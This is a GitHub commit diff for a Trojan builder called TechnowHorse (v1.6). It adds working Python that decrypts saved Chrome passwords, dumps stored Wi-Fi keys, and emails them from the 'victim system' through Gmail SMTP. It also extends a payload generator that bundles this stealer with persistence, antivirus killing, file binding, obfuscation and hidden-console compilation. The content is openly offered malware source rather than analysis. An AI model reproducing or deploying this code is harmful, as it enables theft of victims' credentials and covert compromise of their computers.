Updating to v1.6

PushpenderIndia · Apr 7, 2020 · 83eb267 · 83eb267
1 parent 251e7fd
commit 83eb267
Show file tree

Hide file tree

Showing 5 changed files with 211 additions and 14 deletions.
diff --git a/get_chrome_pass.py b/get_chrome_pass.py
@@ -0,0 +1,42 @@
+import os, sqlite3, win32crypt, six
+#python -m pip install --upgrade pywin32
+
+class GetChromePass:
+    def __init__(self):
+        self.data_path = os.path.expanduser('~').replace("\\", '/') + "/AppData/Local/Google/Chrome/User Data/Default"
+        self.login_db = os.path.join(self.data_path, 'Login Data')
+        self.result = ""
+
+    def start(self):  
+        #Retriving Password Hash From Database File
+        c = sqlite3.connect(self.login_db)  
+        cursor = c.cursor()
+        select_statement = "SELECT origin_url, username_value, password_value FROM logins"
+        cursor.execute(select_statement)
+        login_data = cursor.fetchall()
+
+        credentials_dict = {}  
+
+        #Decrypting password
+        for url, user_name, pwd, in login_data:
+            pwd = win32crypt.CryptUnprotectData(pwd, None, None, None, 0) #Tuple
+            credentials_dict[url] = (user_name, pwd[1])
+
+        #Iterating Each Creds and Storing it in "self.result"
+        for url, credentials in six.iteritems(credentials_dict):
+            if credentials[1]:
+                self.result += "\n\nURL      : " + url
+                self.result += "\nUsername : " + credentials[0]
+                self.result += "\nPassword : " + credentials[1].decode('utf-8')
+
+            else:   
+                self.result += "\n\nURL      : " + url
+                self.result += "\nUsername : NOT FOUND"
+                self.result += "\nPassword : NOT FOUND"
+
+        return self.result
+
+if __name__ == '__main__':
+    test = GetChromePass()
+    result = test.start()
+    print(result)
diff --git a/get_wifi_pass.py b/get_wifi_pass.py
@@ -0,0 +1,39 @@
+import subprocess, re
+
+class GetWifiPassword:
+    def __init__(self):
+        self.command = "netsh wlan show profile"
+        self.result = ""
+
+    def start(self):
+        networks = subprocess.check_output(self.command, shell=True, stderr=subprocess.DEVNULL, stdin=subprocess.DEVNULL)
+        networks = networks.decode(encoding="utf-8", errors="strict")
+        network_names_list = re.findall("(?:Profile\s*:\s)(.*)", networks) 
+
+        for network_name in network_names_list:
+            try:
+                command = "netsh wlan show profile " + network_name + " key=clear"
+                current_result = subprocess.check_output(command, shell=True, stderr=subprocess.DEVNULL, stdin=subprocess.DEVNULL)
+                current_result = current_result.decode(encoding="utf-8", errors="strict")        
+
+                ssid = re.findall("(?:SSID name\s*:\s)(.*)", str(current_result))
+                authentication = re.findall(r"(?:Authentication\s*:\s)(.*)", current_result)
+                cipher = re.findall("(?:Cipher\s*:\s)(.*)", current_result)
+                security_key = re.findall(r"(?:Security key\s*:\s)(.*)", current_result)
+                password = re.findall("(?:Key Content\s*:\s)(.*)", current_result)
+
+                self.result += "\n\nSSID           : " + ssid[0] + "\n"
+                self.result += "Authentication : " + authentication[0] + "\n"
+                self.result += "Cipher         : " + cipher[0] + "\n"
+                self.result += "Security Key   : " + security_key[0] + "\n"
+                self.result += "Password       : " + password[0] 
+            except Exception:
+                pass
+
+        return self.result
+
+if __name__ == '__main__':
+    test = GetWifiPassword()
+    result = test.start()
+    print(result)
+
diff --git a/password_stealer.py b/password_stealer.py
@@ -0,0 +1,71 @@
+#!/usr/bin/python3
+import time, smtplib, platform, getpass
+import get_chrome_pass, get_wifi_pass  #Self Written Modules
+
+#==================================================================
+#Author : Pushpender Singh
+#Website: https://technowlogy.tk
+#==================================================================
+#Usage: Module is send Saved Password of Victim machine to Email.
+#==================================================================
+#Github: https://github.com/Technowlogy-Pushpender/
+#==================================================================
+
+class SendPass:
+    def __init__(self, email, password):
+        self.email = email
+        self.password = password
+        self.system_info = self.get_system_info()
+        self.log = ""
+
+    def get_chrome_browser_creds(self):
+        try:
+            self.log += "SAVED PASSWORDS OF Chrome Browser FROM VICTIM SYSTEM : \n"
+            chrome = get_chrome_pass.GetChromePass()
+            self.log += chrome.start()
+        except Exception:
+            time.sleep(10)
+            self.get_browser_creds()            
+        self.send_mail(self.log)
+        self.log = ""
+
+
+    def get_wifi_creds(self):
+        try:
+            self.log += "SAVED PASSWORDS OF WiFi FROM VICTIM SYSTEM : \n"
+            wifi = get_wifi_pass.GetWifiPassword()
+            self.log += wifi.start()
+        except Exception:
+            time.sleep(10)
+            self.get_wifi_creds()         
+        self.send_mail(self.log)        
+        self.log = ""        
+
+    def get_system_info(self):
+        uname = platform.uname()
+        os = uname[0] + " " + uname[2] + " " + uname[3]
+        computer_name = uname[1]
+        user = getpass.getuser()
+        return "Operating System:\t" + os + "\nComputer Name:\t\t" + computer_name + "\nUser:\t\t\t\t" + user
+
+    def send_mail(self, message):
+        try:
+            message = "Subject: TechnowHorse Reporting With Saved Password\n\n" + "Report From:\n\n" + self.system_info + "\n\n" + message
+            server = smtplib.SMTP("smtp.gmail.com", 587)
+            server.starttls()
+            server.login(self.email, self.password)
+            server.sendmail(self.email, self.email, message)
+            server.quit()
+        except Exception as e:
+            time.sleep(15)
+            self.send_mail(self.log)
+
+if __name__ == '__main__':
+    email = input("Enter Email Address: ")
+    password = input("Enter Email Address: ")    
+    test = SendPass(email, password)
+    test.get_wifi_creds()
+    print("[+] Wifi Password Send Successfully!")
+    test.get_chrome_browser_creds()
+    print("[+] Chrome Browser Password Send Successfully!")    
+
diff --git a/paygen.py b/paygen.py
@@ -12,17 +12,20 @@
 
 if platform.system() == 'Windows':
     PYTHON_PYINSTALLER_PATH = os.path.expanduser("C:/Python37-32/Scripts/pyinstaller.exe")
+    Attacker_System = 'Windows'
 elif platform.system() == 'Linux':
+    Attacker_System = 'Linux'
     PYTHON_PYINSTALLER_PATH = os.path.expanduser("~/.wine/drive_c/Python37-32/Scripts/pyinstaller.exe")
 
 def get_options():
-    parser = argparse.ArgumentParser(description=f'{RED}TechnowHorse v1.5')
+    parser = argparse.ArgumentParser(description=f'{RED}TechnowHorse v1.6')
     parser._optionals.title = f"{GREEN}Optional Arguments{YELLOW}"
     parser.add_argument("-w", "--windows", dest="windows", help="Generate a Windows executable.", action='store_true')
     parser.add_argument("-l", "--linux", dest="linux", help="Generate a Linux executable.", action='store_true')
     parser.add_argument("-t", "--persistence", dest="time_persistent", help="Becoming Persistence After __ seconds. default=10", default=10) 
     parser.add_argument("-b", "--bind", dest="bind", help="AutoBinder : Specify Path of Legitimate file.") 
     parser.add_argument("-k", "--kill_av", dest="kill_av", help="AntivirusKiller : Specify AV's .exe which need to be killed. Ex:- --kill_av cmd.exe") 
+    parser.add_argument("-s", "--steal-password", dest="stealer", help=f"Steal Saved Password from Victim Machine [{RED}Supported OS : Windows{YELLOW}]", action='store_true')
 
     required_arguments = parser.add_argument_group(f'{RED}Required Arguments{GREEN}')
     required_arguments.add_argument("--icon", dest="icon", help="Specify Icon Path, Icon of Evil File [Note : Must Be .ico].")    
@@ -59,11 +62,15 @@ def check_dependencies():
 
 def create_trojan(file_name, email, password, ip, port, time_persistent, legitimate_file=None):    
     with open(file_name, "w+") as file:
-        file.write("import payload,  win32event, winerror, win32api\n")
+        file.write("import payload, win32event, winerror, win32api\n")
+        if arguments.stealer:
+            file.write("import password_stealer\n") 
+        if arguments.bind or arguments.stealer:
+            file.write("import threading\n\n")             
 
         if arguments.bind != None:
             #Codes to Run, Legitimate File on Front End            
-            file.write("import threading, subprocess, sys\n\n")        
+            file.write("import subprocess, sys\n\n")        
             file.write("def run_front_file():\n")        
             file.write(f"\tfile_name = sys._MEIPASS.replace('\\\\', '/') + \"/{legitimate_file}\" \n")       
             file.write(f"\tsubprocess.call(file_name, shell=True)\n\n")
@@ -74,12 +81,26 @@ def create_trojan(file_name, email, password, ip, port, time_persistent, legitim
 
         #Below Codes will check for already running instance,
         file.write("\nmutex = win32event.CreateMutex(None, 1, 'mutex_var_xboz')\n\n")
+
+        if arguments.stealer:
+            #Saved Password Stealer 
+            file.write("def steal():\n")
+            file.write(f"\tsteal = password_stealer.SendPass(\'{email}\', \'{password}\')\n")
+            file.write(f"\tsteal.get_wifi_creds()\n")
+            file.write(f"\tprint(\"[+] Wifi Password Send Successfully!\")\n")
+            file.write(f"\tsteal.get_chrome_browser_creds()\n")
+            file.write(f"\tprint(\"[+] Chrome Browser Password Send Successfully!\")\n\n")          
+
         file.write("def check_and_start():\n")
         file.write("\tif win32api.GetLastError() == winerror.ERROR_ALREADY_EXISTS:\n")
         file.write("\t\tmutex = None\n")
         file.write("\t\tprint(\"[+] Disabling TechNowHorse: Already Running\")\n")
 
         file.write("\telse:\n")  # if no instance running, going to run TechNowHorse
+
+        if arguments.stealer:
+            file.write(f"\t\tt2 = threading.Thread(target=steal)\n")    #Making Stealer Thread  
+            file.write(f"\t\tt2.start()\n\n")                           #Starting Thread        
 
         file.write(f"\t\ttechnowHorse = payload.TrojanHorse(\'{email}\', \'{password}\', \'{ip}\', {port})\n")
         if arguments.kill_av != None and arguments.kill_av != "":
@@ -94,11 +115,7 @@ def create_trojan_linux(file_name, email, password, ip, port, time_persistent):
     with open(file_name, "w+") as file:
         file.write("import payload\n")
 
-        file.write(f"technowHorse = payload.TrojanHorse(\'{email}\', \'{password}\', \'{ip}\', {port})\n")
-        if arguments.kill_av != None and arguments.kill_av != "":
-            file.write(f"technowHorse.kill_av({arguments.kill_av})\n") 
-        else:
-            file.write("technowHorse.kill_av()\n")             
+        file.write(f"technowHorse = payload.TrojanHorse(\'{email}\', \'{password}\', \'{ip}\', {port})\n")             
         file.write(f"technowHorse.become_persistent({time_persistent})\n") 
         file.write("technowHorse.start()\n\n")     
 
@@ -110,8 +127,15 @@ def obfuscating_payload(file_name):
         file.write(text)
 
 def compile_for_windows(file_name):
-    if arguments.bind != None:
+    if arguments.bind != None and arguments.stealer:
+        subprocess.call(f"{PYTHON_PYINSTALLER_PATH} --onefile --noconsole --hidden-import=win32event --hidden-import=winerror --hidden-import=win32api --hidden-import=payload --hidden-import=password_stealer {file_name} -i {arguments.icon} --add-data \"{arguments.bind};.\"", shell=True)                
+
+    elif arguments.bind != None:
         subprocess.call(f"{PYTHON_PYINSTALLER_PATH} --onefile --noconsole --hidden-import=win32event --hidden-import=winerror --hidden-import=win32api --hidden-import=payload {file_name} -i {arguments.icon} --add-data \"{arguments.bind};.\"", shell=True)
+
+    elif arguments.stealer:
+        subprocess.call(f"{PYTHON_PYINSTALLER_PATH} --onefile --noconsole --hidden-import=win32event --hidden-import=winerror --hidden-import=win32api --hidden-import=payload --hidden-import=password_stealer {file_name} -i {arguments.icon}", shell=True)                
+
     else:
         subprocess.call(f"{PYTHON_PYINSTALLER_PATH} --onefile --noconsole --hidden-import=win32event --hidden-import=winerror --hidden-import=win32api --hidden-import=payload {file_name} -i {arguments.icon}", shell=True)
 
@@ -138,12 +162,23 @@ def exit_greet():
     try:
         os.system('cls')
     except Exception as e:
-        os.system('clear')        
+        os.system('clear')   
+    del_junk_file(arguments.output)
     print(GREEN + '''Thank You for using TechNowHorse, Think Great & Touch The Sky!  \n''' + END)
     quit()    
 
 if __name__ == '__main__':
-    os.system('rm -Rf dist')
+    if Attacker_System == 'Windows':
+        try:
+            shutil.rmtree(os.getcwd() + "\\dist")
+        except Exception:
+            pass
+    else:
+        try:
+            os.system('rm -Rf dist')
+        except Exception:
+            pass
+
     try:
         print(banners.get_banner())
         print(f"\t\t{YELLOW}Author: {GREEN}Pushpender | {YELLOW}Website: {GREEN}technowlogy.tk\n")
@@ -187,8 +222,18 @@ def exit_greet():
         check_dependencies()
 
         print(f"\n{YELLOW}[*] Generating Please wait for a while...{MAGENTA}\n")        
-
-        create_trojan(arguments.output, arguments.email, arguments.password, arguments.ip, arguments.port, arguments.time_persistent, arguments.bind)
+
+        if Attacker_System == 'Linux':
+            if arguments.linux:
+                create_trojan_linux(arguments.output, arguments.email, arguments.password, arguments.ip, arguments.port, arguments.time_persistent)
+
+        if Attacker_System == 'Windows' and arguments.linux:
+            print(f"{RED}[!] Linux payload can't be compiled from windows machine")
+            print(f"{YELLOW}[*] Making Payload for Windows ...\n")
+
+        if arguments.windows:
+            create_trojan(arguments.output, arguments.email, arguments.password, arguments.ip, arguments.port, arguments.time_persistent, arguments.bind)
+
         obfuscating_payload(arguments.output)
 
         encrypting_code = encrypt_code.Encrypt()

diff --git a/version.txt b/version.txt
@@ -1,2 +1,2 @@
-1.5
+1.6